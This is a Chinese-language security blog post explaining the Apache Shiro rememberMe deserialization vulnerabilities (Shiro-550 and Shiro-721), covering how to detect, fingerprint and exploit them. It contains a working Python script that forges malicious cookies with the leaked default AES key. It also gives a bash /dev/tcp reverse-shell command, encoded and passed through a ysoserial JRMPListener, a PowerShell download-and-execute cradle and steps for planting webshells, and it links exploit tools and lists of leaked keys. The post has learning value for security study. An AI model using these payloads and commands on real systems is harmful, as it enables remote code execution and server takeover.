一次关于shiro反序列化漏洞的思考

 

0x01前言

之前在我反序列化的那篇文章中(https://www.cnblogs.com/lcxblogs/p/13539535.html),简单说了一下反序列化漏洞,也提了一嘴常见的几种Java框架的反序列化漏洞

当时没想继续说的,但是因为最近正好遇到了,就再来说说关于Apache shiro Java反序列化漏洞的一点思考(本文特指shiro rememberMe 硬编码密钥反序列化漏洞即shiro 550,不是Shiro Padding Oracle Attack那个shiro 721的----------------更新:shiro 721的内容在文末补充上了,师傅们捧个场啊)

 

Apache shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序

三个核心组件:Subject,SecurityManager 和 Realms

 

。。。。。。

 

问题不在这里,问题出在哪里?在shiro1.24及其之前(小于等于1.24)的版本中,shiro框架存在反序列化漏洞(加密的用户信息序列化后存储在名为remember‐me的Cookie中,攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令)

这是个16年的老洞了,但是由于其payload加密而且没啥攻击特征,所以放到现在仍然不过时(吧)

 

0x02 漏洞原理

补充上一点中所说,shiro框架有“记住我”的功能(rememberme),用户登录成功后会生成加密编码后的cookie,cookie是经过序列化,aes加密再base64编码处理后得到的,它的key值就是rememberme

所以服务端对应这个处理顺序,逆过来处理就是先获取rememberme cookie,再解码base64,再解密aes,最后反序列化

这个过程中,利用到了序列化与反序列化,但是此漏洞并不是有序列化反序列化这个过程,就能利用的,由流程可知,想要完整利用成功还需要aes密钥

诶,问题就出在这个密钥身上

众所周知,aes是一种对称加密算法,一旦密钥泄露后果不堪设想

1.2.4之前aes密钥是硬编码在代码中的,base64编码后值就是这个kPH+bIxk5D2deZiIxcaaaA==,就是它没有第二个

这不就完了吗,攻击者构造恶意对象序列化搞一波?

(另:原则上来说只要你获得了rememberme的aes密钥key,一切版本shiro都有反序列化漏洞,尽管后面的shiro版本不再采用硬编码aes密钥,但是希望那些别有用心(别看我,我不知道)去GitHub中搜集别人开源框架中top多少多少shiro密钥的人耗子尾汁,没事搜一下setCipherKey(Base64.decode看看,是不是已经泄漏了,最好不要用网上的密钥(shiro key top100:https://mp.weixin.qq.com/s/sclSe2hWfhv8RZvQCuI8LA),自己生成不香吗)

 

0x03漏洞发现

抓包,如果返回包中set-cookie中如果发现rememberMe=deleteMe,那这就是一个shiro框架妥妥的,可以有端联想,大胆假设(或者发现url中有没有什么cas)

fofa的搜索关键词:header="rememberme=deleteMe"、header="shiroCookie"什么的,可以看到大量相关站

 

 

 

关于检测,网上有很多脚本工具

思路大体都是先获得密钥(通过不讲武德所搜集到的泄露的KEY不断进行匹配测试。注:shiro 1.4.2之前采用aes-CBC加密,而1.4.2之后采用aes-GCM加密,这个写脚本代码加密时需要注意,两者加密方式的区别,要想写通用的脚本就要把两种加密都写上,参考: https://xz.aliyun.com/t/8445、https://blog.csdn.net/qq_34236803/article/details/110958868)

 

 

然后借助ysoserial.jar生成payload,相应平台(ceye.io或dnslog.cn或JRMP)会收到各种请求

比较常规的一个CBC加密编码脚本(这里采用了默认key,可以视情况更换)

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES


def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext


if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])    
print "rememberMe={0}".format(payload.decode())

 运行:python 此脚本名.py IP:端口

然后把生成的rememberMe=什么什么

一并往请求包中的cookie里一扔,发过去

执行java -cp ysoserial.jar ysoserial.exploit.JRMPListener 端口 CommonsCollections4 “ping 某某某.dnslog.cn”    

 然后赶紧跑回去看www.dnslog.cn,refresh一下,如果成功会看到显示出的IP数据

 当然不一定就是我写的那个语句用CommonsCollections4,实际上具体利用链可能有不同,我只是说一下这个思路

 

几个脚本工具,用于检测shiro反序列化漏洞:

https://github.com/sv3nbeast/ShiroScan

https://github.com/insightglacier/Shiro_exploit

https://github.com/teamssix/shiro-check-rce

 

两款被动burpsuite插件:

https://github.com/pmiaowu/BurpShiroPassiveScan

https://github.com/amad3u4/ShiroScanner/

 

 

 

当然具体有哪些gadget可用,需要自行探测,每种情况下可以利用的gadget的数量和种类都是不同的 (什么CommonsCollections1、CommonsCollections2、CommonsCollections3、CommonsCollections4、CommonsCollections8、CommonsCollections10、CommonsBeanutils1等等。。。都是可能的,有些靶场固定了gadget的类型,方便你复现,但实际上不一定)

此处推荐大佬图形化探测利用一体化工具,懒人福音:https://github.com/feihong-cs/ShiroExploit-Deprecated

 

有key有可用的gadget,确实存在shiro反序列化漏洞,就可以开搞了

 

如果目标服务器可以出网,可以尝试结合平台检测

如果目标服务器不能出网,则选择回显检测

shiro  的好基友是Tomcat,所以很多利用是结合Tomcat的,将问题转化为tomcat回显

但是。。。结合tomcat的方法问题很多,生成的payload会过大啦,受到tomcat版本限制啦。。。

可以参考:https://xz.aliyun.com/t/7535

 https://www.cnblogs.com/potatsoSec/p/13060261.html

https://www.cnblogs.com/potatsoSec/p/13381019.html

https://zhuanlan.zhihu.com/p/114625962

 

0x04 漏洞利用

 

常见利用方式

1.反弹shell

Linux下:

举个例子,复现就不复现了,这辈子都不可能写复现的,很多师傅有详细过程,简单说一下流程

原理和上述ping dnslog平台的原理一样,只不过把“ping 某某某.dnslog.cn”这个操作改成反弹shell的操作

然后我一边反弹,另一边监听


(1)先在攻击机本地监听某端口(例如2333)


nc -lvp 2333

bash -i >& /dev/tcp/192.168.25.203/2333 0>&1

将上述命令base64编码后放到“编码后”处  bash -c {echo,编码后}|{base64,-d}|{bash,-i}

即:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI1LjIwMy8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}

 

 (2)然后执行(假设这里采用CommonsCollections4),通过ysoserial中JRMP监听模块,监听6666端口并执行反弹shell命令

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI1LjIwMy8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}'

 

 (3)脚本生成上文那种rememberMe=什么什么  的payload,加到cookie中发过去(注意:这次的  python 此脚本名.py IP:端口  这里的端口是6666)

 

 (4)然后我就会在nc监听的2333端口获得目标服务器shell

 

windows下:

则可以通过powershell

powershell.exe IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:xxxx/xxx.xx'))......

类似这种命令来联动一些CS啦、ps1啦来搞

(上传下载的方法有很多,后续有空说说这部分)

 

 当然以上一切的前提是攻击机VPS、目标服务器网络条件允许,我能接收到此shell

 

2.写入webshell

可以找一个静态资源的URL ,比如网站的什么图片什么验证码什么的,往资源所在目录中写shell,或者往其他什么地方的已知的web路径写shell,然后访问webshell

再次推荐飞鸿师傅的https://github.com/feihong-cs/ShiroExploit-Deprecated

 一步到位(另:不仅shiro550,shiro721也可以采用此工具利用,利用方式有所区别,具体参考开发者自述)

这个马,可以是上面这个工具生成的,也可以是用什么蚁剑、冰蝎的马替换掉工具本身的马

 

但是目前吧。。。文件类型的webshell已经退环境了,内存马还可一用

可以参考此文:https://localhost01.blog.csdn.net/article/details/107340698

 

 

参考文章:https://zhuanlan.zhihu.com/p/170393917

 

2021.3.9内容补充

 -------------------------------------------------------------------------------------------------

额,做人不能半途而废,,,

翻来覆去睡不着。。。

顺便把shiro 721的内容也补一下好了

 

正如我前文所说( Padding Oracle Attack----POA):

1.4.2及之前的shiro版本采用了aes-CBC加密,可以结合有效的RememberMe cookie作为Padding Oracle攻击的前缀,然后精⼼制作rememberMe来进⾏反序列化攻击

 

有几个问题:

padding oracle攻击干了点啥?       它可以在没有获得key的情况下,绕过密钥key实现对密文的加解密(具体实现机制请参考:https://zhuanlan.zhihu.com/p/94970620)

那么为什么需要RememberMe cookie?    由于shiro要求先获取用户信息,获取有效用户信息之后才会进入下一阶段流程,所以需要RememberMe cookie

翻译翻译什么TMD的叫TMD把“有效的rememberMe 作为Padding  Oracle攻击的。。。前缀”?  字面意思,为了不影响反序列化,把合法的rememberMe cookie做前缀,往rememberMe cookie数据后面加数据(详细参考:https://www.anquanke.com/post/id/193165)      

 

所以,相比shiro 550 ,shiro 721 不需要知道key的值,但是需要合法用户的RememberMe cookie

 

服务端处理流程还是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化

 

 

首先需要登录网站从有效用户的cookie中获取rememberMe字段的值

利用与检测方法参考:

https://www.cnblogs.com/backlion/p/14077791.html

https://www.cnblogs.com/xiaozi/p/13239046.html

思路大体是获得合法的rememberMe cookie,用ysoserial生成payload,然后利用padding oracle 方法攻击脚本 结合 合法的rememberMe cookie与payload   生成恶意的rememberMe cookie,然后采用这个恶意的rememberMe cookie重放攻击目标,最后在目标中 生成文件 或 有dnslog 回显IP证明漏洞存在

 

或者直接使用飞鸿师傅的那个工具:https://github.com/feihong-cs/ShiroExploit-Deprecated

 

 把获得的rememberMe cookie加进去

 

 

未经允许,禁止转载

 

posted @ 2021-02-25 22:42  anoldcat  阅读(2322)  评论(0编辑  收藏  举报